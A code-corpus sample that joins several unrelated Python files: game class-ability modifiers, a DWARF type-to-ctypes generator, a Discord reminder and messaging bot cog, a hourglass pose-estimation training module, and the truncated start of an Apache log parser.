def IsFinesseWeapon(creature, weapon):
#Unarmed works
if (weapon == OBJ_HANDLE_NULL):
return 1
#Ranged weapons don't work
weapFlags = weapon.obj_get_int(obj_f_weapon_flags)
if (weapFlags & OWF_RANGED_WEAPON):
return 0
#Light weapon works
wieldType = creature.get_wield_type(weapon)
if (wieldType == 0):
return 1
#Whip, rapier, spiked chain works
WeaponType = weapon.get_weapon_type()
if (WeaponType == wt_whip) or (WeaponType == wt_spike_chain) or (WeaponType == wt_rapier):
return 1
return 0
#Swashbuckler Abilities
# Swashbuckler Grace
def SwashbucklerGraceReflexBonus(attachee, args, evt_obj):
#Must not be encumbered
if SwashbucklerEncumberedCheck(attachee):
return 0
classLvl = attachee.stat_level_get(classEnum)
classBonusLvls = attachee.d20_query("Swashbuckler Grace Level Bonus")
classLvl = classLvl + classBonusLvls
if classLvl < 11:
bonval = 1
elif classLvl < 20:
bonval = 2
else:
bonval = 3
evt_obj.bonus_list.add(bonval, 0, "Swashbuckler Grace" ) #Competence Bonus
return 0
swashbucklerGrace = PythonModifier("Swashbuckler Grace", 2) #Spare, Spare
swashbucklerGrace.MapToFeat("Swashbuckler Grace")
swashbucklerGrace.AddHook(ET_OnSaveThrowLevel , EK_SAVE_REFLEX , SwashbucklerGraceReflexBonus, ())
# Swashbuckler Insightful Strike
def SwashbucklerInsightfulStrikeDamageBonus(attachee, args, evt_obj):
#Must not be encumbered
if SwashbucklerEncumberedCheck(attachee):
return 0
#Must be usable with weapon finesse
weaponUsed = evt_obj.attack_packet.get_weapon_used()
if not IsFinesseWeapon(attachee, weaponUsed):
return 0
#Enemy must be sneak attackable
target = evt_obj.attack_packet.target
if target.d20_query(Q_Critter_Is_Immune_Critical_Hits):
return 0
int = attachee.stat_level_get(stat_intelligence)
intMod = (int - 10)/2
evt_obj.damage_packet.bonus_list.add_from_feat(intMod, 0, 137, "Insightful Strike")
return 0
swashbucklerInsightfulStrike = PythonModifier("Swashbuckler Insightful Strike", 2) #Spare, Spare
swashbucklerInsightfulStrike.MapToFeat("Swashbuckler Insightful Strike")
swashbucklerInsightfulStrike.AddHook(ET_OnDealingDamage, EK_NONE, SwashbucklerInsightfulStrikeDamageBonus, ())
# Swashbuckler Dodge
def SwashbucklerDodgeACBonus(attachee, args, evt_obj):
#Must not be encumbered
if SwashbucklerEncumberedCheck(attachee):
return 0
attacker = evt_obj.attack_packet.attacker
if attacker == OBJ_HANDLE_NULL or attacker == attachee:
return 0
#Test if the ability is used
prevAttacker = args.get_obj_from_args(0)
#Works for each attack from the first attacker like dodge (SRD let you choose the opponent)
if prevAttacker != OBJ_HANDLE_NULL:
if attacker != prevAttacker:
return 0
classLvl = attachee.stat_level_get(classEnum)
classBonusLvls = attachee.d20_query("Swashbuckler Dodge Level Bonus")
classLvl = classLvl + classBonusLvls
bonval = classLvl / 5
evt_obj.bonus_list.add(bonval, 8, 137 ) #Dodge bonus
args.set_args_from_obj(0, attacker)
return 0
def SwashbucklerDodgeBeginRound(attachee, args, evt_obj):
#Reset to a null attacker at the beginning of the round
args.set_args_from_obj(0, OBJ_HANDLE_NULL)
return 0
swashbucklerDodge = PythonModifier("Swashbuckler Dodge", 4) #Used this round flag, Attacker Upper Handle, Attacker Lower Handle, Spare
swashbucklerDodge.MapToFeat("Swashbuckler Dodge")
swashbucklerDodge.AddHook(ET_OnGetAC, EK_NONE, SwashbucklerDodgeACBonus, ())
swashbucklerDodge.AddHook(ET_OnBeginRound, EK_NONE, SwashbucklerDodgeBeginRound, ())
swashbucklerDodge.AddHook(ET_OnConditionAdd, EK_NONE, SwashbucklerDodgeBeginRound, ())
# Swashbuckler Acrobatic Charge
swashbucklerAcrobaticCharge = PythonModifier("Swashbuckler Acrobatic Charge", 2) #Used this round flag, Spare
swashbucklerAcrobaticCharge.MapToFeat("Swashbuckler Acrobatic Charge")
#Swashbuckler Improved Flanking
def SwashbucklerImprovedFlankingAttack(attachee, args, evt_obj):
if evt_obj.attack_packet.get_flags() & D20CAF_FLANKED:
evt_obj.bonus_list.add(2, 0, "Swashbuckler Improved Flanking")
return 0
swashbucklerImprovedFlanking = PythonModifier("Swashbuckler Improved Flanking", 2) #Spare, Spare
swashbucklerImprovedFlanking.MapToFeat("Swashbuckler Improved Flanking")
swashbucklerImprovedFlanking.AddHook(ET_OnToHitBonus2, EK_NONE, SwashbucklerImprovedFlankingAttack, ())
# Swashbuckler Lucky
def SwashbucklerLuckyRerollSavingThrow(attachee, args, evt_obj):
if args.get_arg(0) and args.get_arg(1):
if not evt_obj.return_val:
evt_obj.return_val = 1
args.set_arg(0,0)
return 0
def SwashbucklerLuckyRerollAttack(attachee, args, evt_obj):
if args.get_arg(0) and args.get_arg(2):
if not evt_obj.return_val:
evt_obj.return_val = 1
args.set_arg(0,0)
return 0
def SwashbucklerLuckyRadial(attachee, args, evt_obj):
#Add a checkbox to use the reroll if a charge is available
if args.get_arg(0):
radial_parent = tpdp.RadialMenuEntryParent("Lucky")
LuckyID = radial_parent.add_child_to_standard(attachee, tpdp.RadialMenuStandardNode.Class)
checkboxSavingThrow = tpdp.RadialMenuEntryToggle("Reroll Next Missed Saving Throw", "TAG_INTERFACE_HELP")
checkboxSavingThrow.link_to_args(args, 1)
checkboxSavingThrow.add_as_child(attachee, LuckyID)
checkboxAttack = tpdp.RadialMenuEntryToggle("Reroll Next Missed Attack", "TAG_INTERFACE_HELP")
checkboxAttack.link_to_args(args, 2)
checkboxAttack.add_as_child(attachee, LuckyID)
return 0
def SwashbucklerLuckyNewDay(attachee, args, evt_obj):
args.set_arg(0, 1)
return 0
swashbucklerLucky = PythonModifier("Swashbuckler Lucky", 5) #Used, Reroll Saving Throw, Reroll Attack, Spare, Spare
swashbucklerLucky.MapToFeat("Swashbuckler Lucky")
swashbucklerLucky.AddHook(ET_OnBuildRadialMenuEntry, EK_NONE, SwashbucklerLuckyRadial, ())
swashbucklerLucky.AddHook(ET_OnD20Query, EK_Q_RerollSavingThrow, SwashbucklerLuckyRerollSavingThrow, ())
swashbucklerLucky.AddHook(ET_OnD20Query, EK_Q_RerollAttack, SwashbucklerLuckyRerollAttack, ())
swashbucklerLucky.AddHook(ET_OnConditionAdd, EK_NONE, SwashbucklerLuckyNewDay, ())
swashbucklerLucky.AddHook(ET_OnNewDay, EK_NEWDAY_REST, SwashbucklerLuckyNewDay, ())
# Swashbuckler Acrobatic Skill Mastery
swashbucklerAcrobaticSkillMastery = PythonModifier("Swashbuckler Acrobatic Skill Mastery", 2) #Spare, Spare
swashbucklerAcrobaticSkillMastery.MapToFeat("Swashbuckler Acrobatic Skill Mastery")
# Swashbuckler Weakening Critical
def SwashbucklerWeakeningCriticalOnDamage(attachee, args, evt_obj):
#Enemy must not be immune to criticals
target = evt_obj.attack_packet.target
if target.d20_query(Q_Critter_Is_Immune_Critical_Hits):
return 0
attackFlags = evt_obj.attack_packet.get_flags()
#Must be a critical
criticalHit = attackFlags & D20CAF_CRITICAL
if not criticalHit:
return 0
target.condition_add_with_args( "Damage_Ability_Loss", 0, 2)
game.create_history_freeform(target.description + " takes 2 points of strength damage from weakening critical.\n\n")
target.float_text_line("Strength damage!")
return 0
swashbucklerWeakeningCritical = PythonModifier("Swashbuckler Weakening Critical", 2) #Spare, Spare
swashbucklerWeakeningCritical.MapToFeat("Swashbuckler Weakening Critical")
swashbucklerWeakeningCritical.AddHook(ET_OnDealingDamage2, EK_NONE, SwashbucklerWeakeningCriticalOnDamage, ())
# Swashbuckler Wounding Critical
def SwashbucklerWoundingCriticalOnDamage(attachee, args, evt_obj):
#Enemy must not be immune to criticals
target = evt_obj.attack_packet.target
if target.d20_query(Q_Critter_Is_Immune_Critical_Hits):
return 0
attackFlags = evt_obj.attack_packet.get_flags()
#Must be a critical
criticalHit = attackFlags & D20CAF_CRITICAL
if not criticalHit:
return 0
target.condition_add_with_args( "Damage_Ability_Loss", 2, 2)
game.create_history_freeform(target.description + " takes 2 points of constitution damage from wounding critical.\n\n")
target.float_text_line("Constitution damage!")
return 0
swashbucklerWoundingCritical = PythonModifier("Swashbuckler Wounding Critical", 2) #Spare, Spare
swashbucklerWoundingCritical.MapToFeat("Swashbuckler Wounding Critical")
swashbucklerWeakeningCritical.AddHook(ET_OnDealingDamage2, EK_NONE, SwashbucklerWoundingCriticalOnDamage, ())
| StarcoderdataPython |
3267260 | from abc import abstractproperty
from collections import namedtuple
from math import ceil
from typing import Optional
from elftools.dwarf.die import DIE
from common.exceptions import WrongDIEType
from elf.constants import BITS_IN_BYTE, DIE_TYPE_COLLECTION_TAGS, DIE_TYPE_MODIFIER_TAGS, ENCODING, REFERENCE_FORM_WITH_OFFSET
from program.exceptions import ModifierTypeWithNoReferenceError, NonResolvedReferenceError, UnexpectedChildError
from program.program_abc import ProgramABC
from program.generator.constants import size_map, types_map
class ProgramType(ProgramABC):
"""Class represent types of the program
- dependencies - property retruns list of type dependencies, or None if
references were not resolved
- create() - classmethod creates type object for given DIE
- get_class() - method returns specific class of given type
- alias - members value is alias of given type in generated code -
alias is available only after reference resolution
"""
alias: str
@classmethod
def create(cls, die: DIE) -> Optional['ProgramType']:
"""Create instance of subclass of ProgramType appropriate to given die"""
match(die.tag):
case x if x in DIE_TYPE_MODIFIER_TAGS:
return ProgramTypeModifier.create(die)
case x if x in DIE_TYPE_COLLECTION_TAGS:
return ProgramTypeCollection.create(die)
case 'DW_TAG_enumeration_type':
return ProgramTypeEnum(die)
case 'DW_TAG_base_type':
return ProgramTypeBase(die)
case 'DW_TAG_typedef':
return ProgramTypeTypedef(die)
case 'DW_TAG_array_type':
return ProgramTypeArray(die)
case 'DW_TAG_subroutine_type':
return ProgramTypeFunction(die)
case _:
raise WrongDIEType(f'Creating ProgramType subclass instance with die of tag {die.tag}')
@abstractproperty
def dependencies(self) -> Optional[list['ProgramType']]: ...
class ProgramTypeCollection(ProgramType):
"""Class represents all collection datatypes"""
Member = namedtuple('Member', ['name', 'reference', 'offset', 'bitfield'])
BitField = namedtuple('Bitfield', ['bitsize', 'bitoffset'])
def __init__(self, die: DIE) -> None:
super().__init__(die)
self.alias: str = str(self.get_die_attribute('DW_AT_name'), ENCODING)
self.size = self.get_die_attribute('DW_AT_byte_size')
self.members_refs = self._parse_members()
self._dependencies = None
@classmethod
def create(cle, die: DIE) -> 'ProgramTypeCollection':
"""Creates collection type for given DIE"""
match(die.tag):
case 'DW_TAG_structure_type':
return ProgramTypeStructure(die)
case 'DW_TAG_union_type':
return ProgramTypeUnion(die)
case _:
raise WrongDIEType(f'Creating ProgramTypeCollection subclass instance with die of tag {die.tag}')
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Resolve references for collection members"""
self._dependencies = [object_refs[ref.reference] for ref in self.members_refs]
@property
def dependencies(self) -> list['ProgramType']:
"""Returns dependencies dictated by members or None if
dependencies not resolved.
"""
return self._dependencies
def _parse_members(self) -> list[Member]:
"""Get all structure members, their type references and offsets"""
members = []
for child in self.die.iter_children():
if child.tag != 'DW_TAG_member':
raise UnexpectedChildError(f'Collection {self.alias} has child of type {child.tag}')
name = str(child.attributes['DW_AT_name'].value, ENCODING)
reference = child.attributes['DW_AT_type'].value
if child.attributes['DW_AT_type'].form in REFERENCE_FORM_WITH_OFFSET:
reference += self.die.cu.cu_offset
offset = 0
if 'DW_AT_data_member_location' in child.attributes:
offset = child.attributes['DW_AT_data_member_location'].value
bitfield = None
if 'DW_AT_bit_size' in child.attributes:
bitsize = child.attributes['DW_AT_bit_size'].value
bitoffset = child.attributes['DW_AT_bit_offset'].value
bitfield = self.BitField(bitsize, bitoffset)
members.append(self.Member(name, reference, offset, bitfield))
return members
def _get_members_str(self) -> str:
"""Retruns string descripting collections's members"""
description = ''
for member in self.members_refs:
description += f'\n\t{member}'
return description
def _generate_members(self) -> str:
"""Generate fields of collections members"""
code = f'\t_fields_ = [\n'
for member, dep in zip(self.members_refs, self._dependencies):
code += f'\t\t("{member.name}", {dep.alias}),\n'
code += f'\t]\n'
return code
class ProgramTypeModifier(ProgramType):
"""Class represents modifier of program type"""
def __init__(self, die: DIE):
super().__init__(die)
self.alias = None
self.reference: int = self.get_die_attribute('DW_AT_type')
self.size: int = self.get_die_attribute('DW_AT_byte_size')
self._dependency = None
if self.size is None and self.reference is None:
raise ModifierTypeWithNoReferenceError(f'DIE offset {self.offset} of {die.tag} has no reference')
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Resolve reference of type modifier"""
if self.reference is not None:
self._dependency = object_refs[self.reference]
self.alias = self._dependency.alias
self.size = self._dependency.size
@property
def dependencies(self) -> list['ProgramType']:
"""Dependency of type modifier or None if not resolved.
In case of void pointer no reference is omitted.
"""
if self.reference is not None:
return [self._dependency] if self._dependency is not None else None
return []
@classmethod
def create(cls, die: DIE) -> Optional['ProgramTypeModifier']:
"""Create type modifier for given DIE"""
try:
match(die.tag):
case 'DW_TAG_pointer_type':
return ProgramTypePointer(die)
case 'DW_TAG_const_type':
return ProgramTypeConst(die)
case 'DW_TAG_volatile_type':
return ProgramTypeVolatile(die)
case _:
raise WrongDIEType(f'Creating ProgramTypeModifier subclass instance with die of tag {die.tag}')
except ModifierTypeWithNoReferenceError:
return None
class ProgramTypePointer(ProgramTypeModifier):
"""Instances of this class are pointer modifiers"""
def __init__(self, die: DIE) -> None:
super().__init__(die)
self.alias = None
def __str__(self) -> str:
description = super().__str__()
return description + f'ProgramTypePointer to offset {self.reference if self.reference else "Void"}'
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Resolve reference of type modifier"""
if self.reference is not None:
try:
self._dependency = object_refs[self.reference]
self.refsize = self._dependency.size if self._dependency.size else self.size
except KeyError: # Pointer to constat value
self.refsize = self.size
self.reference = None
else:
self.refsize = self.size
self.alias = f'PointerClass({self.refsize})'
def generate_code(self) -> str:
"""Generate code for pointer type"""
return ''
@property
def dependencies(self) -> list['ProgramType']:
"""Pointers have no dependencies"""
return []
class ProgramTypeConst(ProgramTypeModifier):
"""Instances of this class are const modifiers"""
def __init__(self, die: DIE) -> None:
super().__init__(die)
def __str__(self) -> str:
description = super().__str__()
return description + f'ProgramTypeConst to {self.reference}'
def generate_code(self) -> str:
"""Const modifier is omitted."""
return ''
class ProgramTypeVolatile(ProgramTypeModifier):
"""Instances of this class are volatile modifiers"""
def __init__(self, die: DIE) -> None:
super().__init__(die)
def __str__(self) -> str:
description = super().__str__()
return description + f'ProgramTypeVolatile to {self.reference}'
def generate_code(self) -> str:
"""Volatile modifier is omitted."""
return ''
class ProgramTypeBase(ProgramType):
"""Instances of this class are base program types"""
def __init__(self, die: DIE) -> None:
super().__init__(die)
self._name = str(self.get_die_attribute('DW_AT_name'), ENCODING)
self.alias = types_map[self._name]
self.bitsize = self.get_die_attribute('DW_AT_byte_size') * BITS_IN_BYTE
if self.bitsize is None:
self.bitsize = self.get_die_attribute('DW_AT_bit_size')
self.bitoffset = self.get_die_attribute('DW_AT_bit_offset')
@property
def size(self) -> int:
"""Size of a type in bytes"""
return ceil(self.bitsize / BITS_IN_BYTE)
@property
def dependencies(self) -> Optional[list['ProgramType']]:
"""Base types have no dependencies, returns empty list"""
return []
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Base types have no references"""
return
def __str__(self) -> str:
description = super().__str__()
return description + f'Base type {self.alias} of size {self.size}'
def generate_code(self) -> str:
"""Returns ctype type for given base type"""
return self.alias
class ProgramTypeEnum(ProgramType):
"""Instances of this class are enumeration types"""
Enumerator = namedtuple('Enumerator', ['name', 'value'])
def __init__(self, die: DIE) -> None:
super().__init__(die)
self.alias: str = str(self.get_die_attribute('DW_AT_name'), ENCODING)
self.size: int = self.get_die_attribute('DW_AT_byte_size')
self.enumerators = self._parse_enumerators()
def __str__(self) -> str:
description = super().__str__()
description += f'ProgramTypeEnum {self.alias}'
description += self._get_enumerators_str()
return description
@property
def dependencies(self) -> Optional[list['ProgramType']]:
"""Enumerators have no dependencies, returns empty list"""
return []
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Enumerators have no references"""
return
def generate_code(self) -> str:
"""Generate code of enumeration class"""
code = f'class {self.alias}({size_map[self.size]}, Enum):\n'
code += f'\t_type = {size_map[self.size]}\n'
for enumerator in self.enumerators:
code += f'\t{enumerator.name} = {enumerator.value}\n'
return code
def _parse_enumerators(self) -> list[Enumerator]:
"""Get all structure members, their type references and offsets"""
enumerators = []
for child in self.die.iter_children():
if child.tag != 'DW_TAG_enumerator':
raise UnexpectedChildError(f'Enumerators {self.alias} has child of type {child.tag}')
name = str(child.attributes['DW_AT_name'].value, ENCODING)
value = child.attributes['DW_AT_const_value'].value
enumerators.append(self.Enumerator(name, value))
return enumerators
def _get_enumerators_str(self) -> str:
"""Retruns string descripting it's members"""
description = ''
for member in self.enumerators:
description += f'\n\t{member}'
return description
class ProgramTypeUnion(ProgramTypeCollection):
"""Instances of this class are union types"""
def __str__(self) -> str:
description = super().__str__()
description += f'ProgramTypeUnion {self.alias}'
description += self._get_members_str()
return description
def generate_code(self) -> str:
"""Generate code of ctype Union class"""
code = f'class {self.alias}(Union):\n'
code += self._generate_members()
return code
class ProgramTypeTypedef(ProgramType):
"""Instances of this class are type definitions"""
def __init__(self, die: DIE) -> None:
super().__init__(die)
self.alias: str = str(self.get_die_attribute('DW_AT_name'), ENCODING)
self.reference: int = self.get_die_attribute('DW_AT_type')
self.size: int = self.get_die_attribute('DW_AT_size')
self._dependency: Optional[ProgramType] = None
def __str__(self) -> str:
description = super().__str__()
return description + f'ProgramTypeTypedef of {self.alias} to reference {self.reference or "Void"}'
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Resolve reference for given type alias"""
if self.reference is None:
self._dependency = []
else:
self._dependency = [object_refs[self.reference]]
@property
def dependencies(self) -> Optional[list['ProgramType']]:
"""Return dependencies or none if dependencies to resolved """
return self._dependency
def generate_code(self) -> str:
"""Generate type alias for given name"""
if self._dependency is None:
raise NonResolvedReferenceError(f'{self.alias} generates code with unresolved reference')
if self._dependency == []:
code = f'{self.alias} = Void\n'
else:
code = f'{self.alias} = {self._dependency[0].alias}\n'
return code
class ProgramTypeStructure(ProgramTypeCollection):
"""Instances of this class are structure types"""
def __str__(self) -> str:
description = super().__str__()
description += f'ProgramTypeStructure {self.alias}'
description += self._get_members_str()
return description
def generate_code(self) -> str:
"""Generates code of structure type"""
code = f'class {self.alias}(Structure):\n'
code += self._generate_members()
return code
class ProgramTypeArray(ProgramType):
"""Instances of this class are array types"""
def __init__(self, die: DIE) -> None:
super().__init__(die)
self.reference = self.get_die_attribute('DW_AT_type')
self.alias = None
self._dependency = None
for child in self.die.iter_children():
match(child.tag):
case 'DW_TAG_subrange_type' if 'DW_AT_upper_bound' in child.attributes:
self.count = child.attributes['DW_AT_upper_bound'].value + 1
break
case 'DW_TAG_subrange_type' if 'DW_AT_count' in child.attributes:
self.count = child.attributes['DW_AT_count'].value
break
def __str__(self) -> str:
description = super().__str__()
return description + f'ProgramTypeArray of reference {self.reference}, elems {self.count}'
@property
def dependencies(self) -> Optional[list['ProgramType']]:
"""Return array type dependency or None if dependency not resolved"""
return [self._dependency] if self._dependency is not None else None
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Resolve array type dependency"""
self._dependency = object_refs[self.reference]
self.alias = f'{self._dependency.alias}_array_{self.count}'
def generate_code(self) -> str:
"""Generate definition of given array type"""
return f'{self.alias} = {self._dependency.alias} * {self.count}'
class ProgramTypeFunction(ProgramType):
ArgumentType = namedtuple('ArgumentType', ['reference'])
def __init__(self, die: DIE):
super().__init__(die)
self.reference: int = self.get_die_attribute('DW_AT_type')
self.arg_types: list[self.ArgumentType] = self._parse_arguments()
self.size: int = self.get_die_attribute('DW_AT_byte_size')
self._dependency = None
self.alias = None
def __str__(self) -> str:
description = super().__str__()
description += f'ProgramTypeFunction of reference {self.reference}'
description += self._get_arguments_str()
return description
@property
def dependencies(self) -> Optional[list['ProgramType']]:
"""Dependencies of given function type, None if dependencies were not resolved"""
return self._dependency
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Resolve dependencies of given funciton type"""
self._dependency = []
if self.reference:
self._dependency += [object_refs[self.reference]]
self._dependency += [object_refs[arg.reference] for arg in self.arg_types]
self.alias = f'FunctionType_{self.offset}'
def generate_code(self) -> str:
"""Generate code of given function - create function type class"""
code = f'class {self.alias}(FunctionType):\n'
code += f'\t_return_type = {self._dependency[0].alias if self.reference else "Void"}\n'
code += f'\t_args = [{", ".join(arg.alias for arg in self._dependency[1:])}]\n'
return code
def _parse_arguments(self) -> list[ArgumentType]:
"""Get all function type argument types references"""
arg_types = []
for child in self.die.iter_children():
if child.tag != 'DW_TAG_formal_parameter':
raise UnexpectedChildError(f'Function type of offset {self.offset} has child of type {child.tag}')
reference = child.attributes['DW_AT_type'].value
if child.attributes['DW_AT_type'].form in REFERENCE_FORM_WITH_OFFSET:
reference += self.die.cu.cu_offset
arg_types.append(self.ArgumentType(reference))
return arg_types
def _get_arguments_str(self) -> str:
"""Retruns string descripting it's members"""
description = ''
for arg_type in self.arg_types:
description += f'\n\t{arg_type}'
return description
| StarcoderdataPython |
3390038 | <filename>cogs/message.py
import discord, random, os, asyncio, time
from discord.ext import commands
import discord.ext.commands
import datetime, asyncpg
from cogs.pokemon import pokemon
from asyncio import sleep
from main import client
p = pokemon(client)
class message(commands.Cog):
"""A class containing commands allowing to message another discord members.
The remind commands uses PostgreSQL."""
def __init__(self, bot):
self.bot = bot
@commands.command(aliases=['alarm'])
async def reminder(self, ctx, time: int, *, message):
"""Sends a reminder to the user after time minutes. Pings the user
with the specified message."""
await p.reward(ctx.author.id, 1)
await ctx.send("I will remind you the message in " + str(time) + " minutes.")
await sleep(60 * time)
await ctx.send(f'{ctx.author.mention}' + " , you sent yourself a reminder saying: " + str(message))
@commands.command()
async def dm(self, ctx, member: discord.Member = None, *, message):
"""Private messages a user the message sent."""
await p.reward(ctx.author.id, 1)
print(member)
await member.send(f'{ctx.author}' + ' sent you a message saying: ' + message)
await ctx.send(":white_check_mark: Sent!")
@commands.command(aliases=['remind'])
async def rm(self, ctx, member: discord.Member = None, *, message):
"""Reminds a user the message sent. The maximum messages a user can have in
their inbox is 10. The next time a user posts something, the bot reminds the
user the message unless the user has nrm toggled."""
assert len(message) < 300, await ctx.send("The given message is too long to send :frowning: ")
assert len(message) > 0, await ctx.send("The given message is too short to send :frowning:")
await p.reward(ctx.author.id, 1)
member = ctx.author if member is None else member
user = await self.bot.pg_con.fetch("SELECT * FROM message WHERE id = $1", member.id)
usage = await self.bot.pg_con.fetch("SELECT * from tusage where cmd = $1", 'rm')
if not user:
await self.bot.pg_con.execute("INSERT INTO message (id) VALUES ($1) ", member.id)
user = await self.bot.pg_con.fetch("SELECT * FROM message WHERE id = $1", member.id)
if len(user[0]['msg']) > 9:
await ctx.send("The user's inbox is full :frowning: ")
return
if ctx.author.id in user[0]['blocks']:
await ctx.send(f"{member.display_name} has you blocked :frowning: ")
return
rm_number = usage[0]['usage'] + 1
message_to_send = f"{ctx.author} sent you a message saying: ** {message} ** (reminder #{rm_number}) [change this alert with the nrm command]"
await self.bot.pg_con.execute("UPDATE message SET msg = array_append (msg, $1) where id = $2", message_to_send,
member.id)
await self.bot.pg_con.execute("UPDATE tusage SET usage = $1 where cmd = $2", rm_number,
'rm') # reminder message number
await ctx.send(f"I will remind {member.display_name} the message :smile: ")
@commands.command()
async def read(self, ctx):
"""The user reads the messages in their inbox, usually if nrm is toggled on."""
await p.reward(ctx.author.id, 1)
user = await self.bot.pg_con.fetch("SELECT * FROM message WHERE id = $1", ctx.author.id) # member.id)
message = user[0]['msg']
if not user or not message:
await ctx.send("You do not have any messages in your inbox.")
return
length = len(message)
await self.bot.pg_con.execute("UPDATE message SET msg = array_remove (msg, $1) where id = $2", message[0],
ctx.author.id)
await self.bot.pg_con.execute("UPDATE message SET archive = array_append (archive, $1) where id = $2",
message[0], ctx.author.id) # stores all messages in the archive
await ctx.send(f" {ctx.author.mention}, {message[0]}. You have {length - 1} messages remaining in your inbox.")
@rm.error
async def rm_error(self, ctx, error): # Returns an error when a member cannot be found.
if isinstance(error, commands.BadArgument):
await ctx.send('I could not find that user.')
await p.reward(ctx.author.id, 1)
@commands.command()
async def block(self, ctx, *, member: discord.Member):
"""Block a member from allowing them to send messages to you. """
await p.reward(ctx.author.id, 1)
assert member.id != 203020214332424192, await ctx.send(
"You cannot block this user.") # people cannot block the user Satella#4021
user = await self.bot.pg_con.fetch("SELECT * FROM message WHERE id = $1", ctx.author.id) # member.id)
if member.id not in user[0]['blocks']:
await self.bot.pg_con.execute("UPDATE message SET blocks = array_append (blocks, $1) where id = $2",
member.id, ctx.author.id)
await ctx.send(
f"I have successfully blocked {member.display_name} from sending you remind messages :smile: ")
else:
await self.bot.pg_con.execute("UPDATE message SET blocks = array_remove (blocks, $1) where id = $2",
member.id, ctx.author.id)
await ctx.send(
f"I have successfully unblocked {member.display_name} from sending you remind messages :smile: ")
@commands.command()
async def blocks(self, ctx):
"""Showcases the list of people the user has blocked. """
await p.reward(ctx.author.id, 1)
user = await self.bot.pg_con.fetch("SELECT blocks FROM message WHERE id = $1", ctx.author.id) # member.id)
if not user or not user[0]['blocks']:
await ctx.send(f"{ctx.author.display_name}, you do not have anyone blocked.")
return
lst = []
for item in user[0]['blocks']:
lst.append(ctx.guild.get_member(item).name)
rv = ", ".join(lst)
await ctx.send(f"{ctx.author.display_name}, you have blocked: {rv} ({len(lst)} blocks total)")
@commands.command()
async def nrm(self, ctx):
"""If nrm is toggled on, remind messages won't be shown automatically. Instead,
the user must use the read command to read messages that are sent to their inbox. """
await p.reward(ctx.author.id, 1)
user = await self.bot.pg_con.fetch("SELECT nrm FROM message WHERE id = $1", ctx.author.id)
if not user:
await self.bot.pg_con.execute("INSERT INTO message (id, nrm) VALUES ($1, True) ", member.id)
await ctx.send(f"{ctx.author.display_name}, you have turned off automatic reminds.")
if not user[0]['nrm']: # automatic reminds are currently on and will be off
await self.bot.pg_con.execute("UPDATE message SET nrm = $1 where id = $2", True, ctx.author.id)
await ctx.send(f"{ctx.author.display_name}, you have turned off automatic reminds.")
elif user[0]['nrm']:
await self.bot.pg_con.execute("UPDATE message SET nrm = $1 where id = $2", False, ctx.author.id)
await ctx.send(f"{ctx.author.display_name}, you have turned on automatic reminds.")
def setup(bot):
bot.add_cog(message(bot))
| StarcoderdataPython |
1783937 | from os.path import join
import torch
from kornia import geometry
from ..agents.base import BaseModule
from ..dataset import JointsConstructor
from ..models.hourglass import HourglassModel
from ..models.metrics import MPJPE
from ..utils import average_loss
class HourglassEstimator(BaseModule):
"""
Agent for training and testing 2d joints estimation using multi-stage Hourglass model
"""
def __init__(self, hparams):
super(HourglassEstimator, self).__init__(hparams, JointsConstructor)
self.n_channels = self._hparams.dataset.n_channels
self.n_joints = self._hparams.dataset.N_JOINTS
params = {
'n_channels':
self._hparams.dataset['n_channels'],
'N_JOINTS':
self._hparams.dataset['N_JOINTS'],
'backbone_path':
join(self._hparams.model_zoo, self._hparams.training.backbone),
'n_stages':
self._hparams.training['stages']
}
self.model = HourglassModel(**params)
self.metrics = {"MPJPE": MPJPE(reduction=average_loss)}
def forward(self, x):
x = self.model(x)
return x
def predict(self, output):
"""
It calculates 2d joints as pixel coordinates (x, y) on image plane.
Args:
output: Output of the model
Returns:
torch tensor of shape (BATCH_SIZE, NUM_JOINTS, 2)
"""
pred_joints = geometry.denormalize_pixel_coordinates(
geometry.spatial_expectation2d(output[-1]),
self._hparams.dataset.MAX_HEIGHT, self._hparams.dataset.MAX_WIDTH)
return pred_joints
def _calculate_loss(self, outs, b_y, b_masks):
loss = 0
for x in outs:
loss += self.loss_func(x, b_y, b_masks)
return loss
def _eval(self, batch):
b_x, b_y, b_masks = batch
output = self.forward(b_x) # cnn output
loss = self._calculate_loss(output, b_y, b_masks)
gt_joints = geometry.denormalize_pixel_coordinates(
b_y, self._hparams.dataset.MAX_HEIGHT, self._hparams.dataset.MAX_WIDTH)
pred_joints = self.predict(output)
results = {
metric_name: metric_function(pred_joints, gt_joints, b_masks)
for metric_name, metric_function in self.metrics.items()
}
return loss, results
def training_step(self, batch, batch_idx):
b_x, b_y, b_masks = batch
outs = self.forward(b_x) # cnn output
loss = self._calculate_loss(outs, b_y, b_masks)
logs = {"loss": loss}
return {"loss": loss, "log": logs}
def validation_step(self, batch, batch_idx):
loss, results = self._eval(batch)
return {"batch_val_loss": loss, **results}
def validation_epoch_end(self, outputs):
avg_loss = torch.stack([x['batch_val_loss'] for x in outputs]).mean()
results = self._get_aggregated_results(outputs, 'val_mean')
logs = {'val_loss': avg_loss, **results, 'step': self.current_epoch}
return {'val_loss': avg_loss, 'log': logs, 'progress_bar': logs}
def test_step(self, batch, batch_idx):
loss, results = self._eval(batch)
return {"batch_test_loss": loss, **results}
def test_epoch_end(self, outputs):
avg_loss = torch.stack([x['batch_test_loss'] for x in outputs]).mean()
results = self._get_aggregated_results(outputs, 'test_mean')
logs = {'test_loss': avg_loss, **results, 'step': self.current_epoch}
return {**logs, 'log': logs, 'progress_bar': logs}
| StarcoderdataPython |
144778 | <gh_stars>1-10
#!/usr/bin/env python2
#import pytest
from pyspark import SparkContext,HiveContext
################################################################
## Code for parsing Apache weblogs
## This is an improved parser that's tolerant of bad data.
## Instead of throwing an error, it return a Row() object
## with all NULLs
from pyspark.sql import Row
import dateutil, dateutil.parser, re
APPACHE_COMBINED_LOG_REGEX = '([(\d\.)]+) [^ ]+ [^ ]+ \[(.*)\] "(.*)" (\d+) [^ ]+ ("(.*)")? ("(.*)")?'
WIKIPAGE_PATTERN = "(index.php\?title=|/wiki/)([^ &]*)"
